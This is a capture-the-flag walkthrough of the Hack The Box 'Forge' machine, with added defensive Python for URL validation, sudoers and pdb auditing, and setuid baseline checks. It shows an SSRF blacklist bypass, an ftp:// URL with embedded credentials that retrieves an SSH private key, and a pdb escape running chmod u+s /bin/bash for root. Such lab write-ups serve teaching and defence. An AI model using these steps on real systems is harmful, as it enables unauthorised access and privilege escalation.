Forge hack the box walkthrough


NAME Forge
DIFFICULTY Medium
POINTS 30
IP 10.10.11.111



In this post we are going to see the walkthrough (write-up) for the Forge Hack The Box machine, and we are going to capture both the user flag and the root flag. So let's get started. A video is also available in the middle and at the end of the post (please check it).

First I load the IP 10.10.11.111 in the browser, and it redirects to forge.htb.




So add this hostname to the /etc/hosts file to access the page.

Now you can access the page.





ENUMERATION:


Next, we run an nmap scan.

STEP 1: nmap -sC -sV 10.10.11.111

The report is given below.

Analysing the nmap report, I found interesting ports and services such as SSH on 22 and FTP on 21.


Next, we enumerate directories using gobuster.

STEP 2: gobuster dir -u http://forge.htb -w /usr/share/dirb/wordlists/common.txt

The report is given below.

Analysing the gobuster report, nothing of interest turned up.



Next, we enumerate subdomains (virtual hosts).

STEP 3: gobuster vhost forge.htb -u http://forge.htb -w /usr/share/seclists/Discovery/DNS/subdomain-top1million-110000.txt -r

The report is given below.

Analysing further, I found the subdomain admin.forge.htb.



So add this domain to the /etc/hosts file as well to access the page.

After visiting this subdomain I found that it only allows access from localhost, while the site's upload-from-URL feature blacklists that domain (if you don't understand, just follow along and you will get the idea).



Let us see that.



So first go to the upload page (shown in the image below).

Here you can see two options: upload a local file and upload from a URL.

I tried uploading a reverse shell, but it did not work, so we try the upload-from-URL option instead.

Now we enter the subdomain here, which is http://admin.forge.htb


Before that, open Burp Suite to capture the request.

After capturing the request in Burp Suite, send it to Repeater.

Next, send the request to get the response.

From the response you can see that the URL has been blacklisted (shown in the image below).






So let us bypass this by changing the lowercase letters of the hostname to uppercase (the blacklist compares the string case-sensitively, while DNS and the web server do not care about case).

Let us change the URL to http://ADMIN.FORGE.HTB

Edit the URL and send the request again (shown in the image below).

Now it works: you can see that the file has been uploaded (shown in the image above).




Loading this URL in the browser does not work, so let us fetch it with curl.

STEP 4: curl http://forge.htb/uploads/yrqwrstyghjdklo

Now you can see another directory, /announcements.




So next we request this directory through Burp Suite in the same way (shown in the image below).

Now we curl the new upload.

STEP 5: curl http://forge.htb/uploads/ymkldklsdkkdfjfrewee4rrtf

booooooooooooom!!!!!!!!!!!

Now you can see the FTP username and password.





So next we use these credentials to log in.

So first go back to Burp Suite and change the URL to:

http://ADMIN.FORGE.HTB/upload?u=ftp://user:heightofsecurity123!@127.1.1.1/.ssh/id_rsa

Now you get the id_rsa key, so next we log in through SSH.
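The two weaknesses used above, a case-sensitive hostname blacklist and an unrestricted URL scheme that lets ftp:// with embedded credentials through, both come from checking the raw URL string instead of the parsed URL. The following Python is an added example written for this post, not code from the Forge machine or its application: weak_url_allowed() is a constructed stand-in for that kind of check, and hardened_url_allowed() shows the fix (parse, normalise, restrict the scheme, reject embedded credentials, resolve the host and refuse non-public addresses). The INTERNAL_HOSTS set and the DEMO_DNS table are constructed so the example runs offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Hostnames the application treats as its own. Constructed from the names in
# the walkthrough; a real deployment would load these from configuration.
INTERNAL_HOSTS = {"localhost", "forge.htb", "admin.forge.htb"}


def weak_url_allowed(url: str) -> bool:
    """A case-sensitive substring blacklist on the raw URL string, the kind of
    check the walkthrough defeats. 'ADMIN.FORGE.HTB' contains none of the
    lowercase strings, and the scheme is never inspected, so ftp:// with
    embedded credentials passes as well."""
    blacklist = ("localhost", "127.0.0.1", "forge.htb")
    return not any(bad in url for bad in blacklist)


def resolve_host(host: str) -> list[str]:
    """Resolve a hostname to its addresses. Kept separate so demos and tests
    can substitute a constructed table and run offline."""
    infos = socket.getaddrinfo(host, None)
    return sorted({info[4][0].split("%")[0] for info in infos})


def hardened_url_allowed(url: str, resolve=resolve_host) -> tuple[bool, str]:
    """Parse, normalise, then decide. Returns (allowed, reason)."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):       # urlsplit lowercases the scheme
        return False, f"scheme {parts.scheme!r} not allowed"
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL not allowed"
    host = (parts.hostname or "").rstrip(".")       # .hostname is already lowercased
    if not host:
        return False, "missing host"
    if host in INTERNAL_HOSTS:
        return False, f"host {host!r} is internal"
    # An IP literal needs no lookup; everything else is resolved so that a
    # public-looking name that points at 127.x or 10.x is still caught.
    try:
        addrs = [str(ipaddress.ip_address(host))]
    except ValueError:
        try:
            addrs = resolve(host)
        except OSError:
            return False, f"host {host!r} does not resolve"
    for addr in addrs:
        if not ipaddress.ip_address(addr).is_global:
            return False, f"host {host!r} resolves to non-public address {addr}"
    return True, "ok"


# Constructed resolver table for the offline demo. 1.1.1.1 stands in for an
# arbitrary public address; admin.forge.htb resolving to loopback mirrors the box.
DEMO_DNS = {"admin.forge.htb": ["127.0.0.1"], "forge.htb": ["10.10.11.111"],
            "example.com": ["1.1.1.1"]}


def demo_resolve(host: str) -> list[str]:
    if host not in DEMO_DNS:
        raise OSError(f"unknown host {host}")
    return DEMO_DNS[host]


if __name__ == "__main__":
    for url in ("http://admin.forge.htb", "http://ADMIN.FORGE.HTB",
                "ftp://user:pw@127.1.1.1/.ssh/id_rsa", "http://example.com/"):
        print(f"{url:42} weak={weak_url_allowed(url)!s:5} "
              f"hardened={hardened_url_allowed(url, demo_resolve)}")
```

Validation alone is not enough: the fetch must connect to the address that was validated (or re-check after every redirect), otherwise a DNS answer that changes between check and fetch, or a 302 to http://localhost, produces the same result the walkthrough shows.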




So save the id_rsa key to a file and set its permissions with chmod 600 id_rsa.

STEP 6: ssh -i id_rsa user@10.10.11.111

boooooooooooooooooooooooooooooooooooooom!!!!!!!!!!!!!

Now you can see the user flag, user.txt.




STEP 7: ls

STEP 8: cat user.txt

If anything is unclear, please watch the video for the user flag.





PRIVILEGE ESCALATION 


Next we go for the root flag, root.txt.

STEP 9: sudo -l

This lists the user's sudo privileges.

Now you can see the remote-manage.py file.

So let us check the Python code.

 

STEP 10: cat /opt/remote-manage.py

Analysing this code further, I found two interesting things. The first is the password, secretadminpassword.

The other interesting thing is PDB.

PDB - the Python debugger

It is Python's interactive source-code debugger module; when a program drops into it, whoever is at the prompt can run arbitrary Python with the program's privileges.

So now we escalate privileges using PDB.
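A script that sudo runs as root and that opens pdb in its exception handler is a root shell waiting for one malformed input. The following Python is an added example written for this post, not the machine's remote-manage.py: it parses sudoers rules that launch Python scripts and statically scans those scripts for debugger hooks (pdb/ipdb imports, post_mortem/set_trace calls, breakpoint()). SAMPLE_SUDOERS and SAMPLE_SCRIPT are constructed imitations of the pattern, including the NOPASSWD tag, which the walkthrough implies but never shows.

```python
import ast
import re
from dataclasses import dataclass

# Modules and calls that hand whoever reaches them an interactive prompt
# running with the script's privileges.
DEBUGGER_MODULES = {"pdb", "ipdb", "pudb"}
DEBUGGER_CALLS = {
    ("pdb", "set_trace"), ("pdb", "post_mortem"), ("pdb", "pm"),
    ("ipdb", "set_trace"), ("ipdb", "post_mortem"),
    ("code", "interact"), ("IPython", "embed"),
}
DEBUGGER_BUILTINS = {"breakpoint"}


@dataclass(frozen=True)
class Finding:
    rule: str
    lineno: int
    detail: str


def find_debugger_hooks(source: str) -> list[Finding]:
    """Statically locate debugger imports and calls in Python source."""
    tree = ast.parse(source)
    findings = []
    from_imports = {}                      # local name -> (module, original name)
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in DEBUGGER_MODULES:
                    findings.append(Finding("debugger-import", node.lineno, f"import {alias.name}"))
        elif isinstance(node, ast.ImportFrom) and node.module:
            for alias in node.names:
                from_imports[alias.asname or alias.name] = (node.module, alias.name)
                if node.module.split(".")[0] in DEBUGGER_MODULES:
                    findings.append(Finding("debugger-import", node.lineno,
                                            f"from {node.module} import {alias.name}"))
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        if isinstance(func, ast.Attribute) and isinstance(func.value, ast.Name):
            target = (func.value.id, func.attr)          # pdb.post_mortem(...)
        elif isinstance(func, ast.Name):
            target = from_imports.get(func.id, (None, func.id))   # post_mortem(...) / breakpoint()
        else:
            continue
        if target in DEBUGGER_CALLS:
            findings.append(Finding("debugger-call", node.lineno, f"{target[0]}.{target[1]}()"))
        elif target[0] is None and target[1] in DEBUGGER_BUILTINS:
            findings.append(Finding("debugger-call", node.lineno, f"{target[1]}()"))
    return sorted(findings, key=lambda f: f.lineno)


# user host = (runas) TAG: cmd, cmd   (the common sudoers rule shape)
_SUDO_RULE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def sudo_python_scripts(sudoers_text: str) -> list[tuple[str, str, bool]]:
    """Return (user, script, nopasswd) for rules that run a Python interpreter on a script."""
    rules = []
    for raw in sudoers_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias")):
            continue
        m = _SUDO_RULE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            argv = cmd.split()
            if len(argv) >= 2 and re.search(r"/python[0-9.]*$", argv[0]):
                rules.append((m.group("user"), argv[1], nopasswd))
    return rules


def audit(sudoers_text: str, script_sources: dict[str, str]) -> list[dict]:
    """Cross-reference sudo rules with the scripts they launch; a rule is reported
    when its script contains a debugger hook or cannot be read at all."""
    report = []
    for user, script, nopasswd in sudo_python_scripts(sudoers_text):
        source = script_sources.get(script)
        hooks = find_debugger_hooks(source) if source is not None else []
        if hooks or source is None:
            report.append({"user": user, "script": script, "nopasswd": nopasswd,
                           "hooks": hooks, "missing": source is None})
    return report


# Constructed sudoers rule and script imitating the pattern in the walkthrough
# (not the machine's real files): a root-run script whose error handler opens
# a post-mortem debugger on the client's socket.
SAMPLE_SUDOERS = """\
Defaults env_reset
user ALL=(ALL) NOPASSWD: /usr/bin/python3 /opt/remote-manage.py
"""
SAMPLE_SCRIPT = '''\
import socket, pdb

def serve(conn):
    conn.sendall(b"choice: ")
    choice = int(conn.recv(1024))      # any non-numeric input raises ValueError
    return choice

def main(conn):
    try:
        return serve(conn)
    except Exception as e:
        print(e)
        pdb.post_mortem(e.__traceback__)   # interactive prompt, still running as root
'''

if __name__ == "__main__":
    for entry in audit(SAMPLE_SUDOERS, {"/opt/remote-manage.py": SAMPLE_SCRIPT}):
        print(entry)
```

The fix on the script side is to log the exception and exit instead of calling pdb, and on the policy side to avoid sudo rules that run an interpreter on a file the caller can influence; the audit above is meant to be run from configuration management against the real /etc/sudoers and /etc/sudoers.d files.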



So first we run the program with the command below:

STEP 11: sudo /usr/bin/python3 /opt/remote-manage.py

Now it is listening on localhost, port 49894.

Warning: please note that the port is chosen randomly and will be different on each run.


Next, open another terminal and SSH in again:

STEP 12: ssh -i id_rsa user@10.10.11.111

Now connect to the listener with netcat on localhost:

STEP 13: nc localhost 49894

Now it asks for the password, which is secretadminpassword.




Then enter some arbitrary text, for example hackedbytamilcodevicky (shown in the image below). The unexpected input raises an exception, and the script's error handler drops into PDB.

Now you get the PDB shell.

Then enter the code below:

import os
os.system('chmod u+s /bin/bash')

Now exit from the PDB shell.








STEP 14: /bin/bash -p

STEP 15: cd root

STEP 16: cat root.txt

booooooooooooooooooooooooooooooooooooooooooooooooooommmmmmm!!!!

Now you have a root shell and can read the root flag, root.txt.
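The escalation above leaves a setuid copy of bash behind, which is exactly what a setuid baseline check catches. The following Python is an added example written for this post, not a tool from the walkthrough: it walks a directory tree, lists regular files with the setuid bit set, and diffs them against an expected set. EXPECTED_SETUID is a constructed baseline, and build_demo_tree() creates a throwaway directory with one setuid file so the check can be exercised without root.

```python
import os
import stat
import tempfile

# Constructed baseline of setuid binaries expected on a typical Ubuntu host.
# Generate the real one from a clean image of the same build, never from the
# host being checked.
EXPECTED_SETUID = {
    "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/passwd", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/bin/fusermount", "/usr/bin/pkexec",
}


def setuid_files(root: str) -> list[str]:
    """Return every regular file under `root` with the setuid bit set.
    Symlinks are not followed, so a link to a setuid target is reported
    once, at the target, not at the link."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:            # vanished or unreadable entry
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return sorted(found)


def unexpected_setuid(root: str, baseline=EXPECTED_SETUID) -> list[str]:
    """Setuid files missing from the baseline. A `chmod u+s /bin/bash` shows
    up here as /usr/bin/bash on merged-/usr systems (or /bin/bash on older ones)."""
    return [p for p in setuid_files(root) if p not in baseline]


def build_demo_tree() -> tuple[str, str, str]:
    """Create a throwaway directory with one setuid file and one plain file.
    Setting the bit on a file you own needs no root, so this runs anywhere."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    bindir = os.path.join(root, "bin")
    os.makedirs(bindir)
    suid_path = os.path.join(bindir, "bash-copy")
    plain_path = os.path.join(bindir, "plain")
    for path in (suid_path, plain_path):
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\necho demo\n")
    os.chmod(suid_path, 0o4755)        # setuid + rwxr-xr-x
    os.chmod(plain_path, 0o755)
    return root, suid_path, plain_path


if __name__ == "__main__":
    root, suid_path, _ = build_demo_tree()
    print("demo tree:", unexpected_setuid(root, baseline=set()))
    print("/usr/bin:", unexpected_setuid("/usr/bin"))
```

Run unexpected_setuid('/') from cron or a configuration-management check and alert on any result; a file-integrity monitor such as AIDE, or an auditd rule on chmod of system binaries, gives the same signal closer to real time.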






If anything in this article is unclear, please watch the video for the root flag.

I hope this article was helpful. If you liked it, please donate to us.

If you want any support, please join the tamilcode membership.












